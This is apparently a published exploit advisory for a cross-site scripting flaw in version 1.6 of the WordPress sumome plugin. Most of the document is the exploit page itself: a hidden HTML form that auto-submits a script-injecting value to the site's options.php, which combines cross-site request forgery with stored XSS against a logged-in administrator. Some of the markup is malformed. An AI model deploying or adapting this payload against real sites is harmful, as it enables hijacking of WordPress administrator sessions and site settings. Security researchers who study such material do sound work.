Wordpress sumome 1.6 Cross Site Scripting Vulnerability

######################

# Exploit Title : Wordpress sumome 1.6 Cross Site Scripting

# Exploit Author : Ashiyane Digital Security Team

# Vendor Homepage : https://wordpress.org/plugins/sumome/

# Software Link :https://downloads.wordpress.org/plugin/sumome.zip

# Date : 2015-01-03

# Tested on : Windows 7 / Mozilla Firefox

######################

# Location : http://127.0.0.1/wordpress/wp-admin/options-general.php?page=sumome

######################

Exploit Code:

<html>

<body>

<style>

#test{

display:none;

}

</style>

<div id="test">

<form method="post" action="http://localhost/wordpress/wp-admin/options.php">

<input type='hidden' name='option_page' value='sumome' /><input type="hidden"

name="action" value="update" /><input type="hidden" id="_wpnonce"

name="_wpnonce" value="934a83b2a9" /><input type="hidden"

name="_wp_http_referer"

value="/wordpress/wp-admin/options-general.php?page=sumome&settings-updated=true" /> <div

class="sumome-instructions">

<input type="text" name="sumome_site_id" id="sumome_site_id"

value='"><script>alert(1)</script>' style="width: 540px"

<p class="submit"><input type="submit" name="submit" id="submit"

class="button button-primary" value="Save Changes" /></p> </form>

</div>

**********

function clickin(){

document.getElementById('submit').click()

}setTimeout("clickin()",0000);

</script>

</body>

</html>

Rating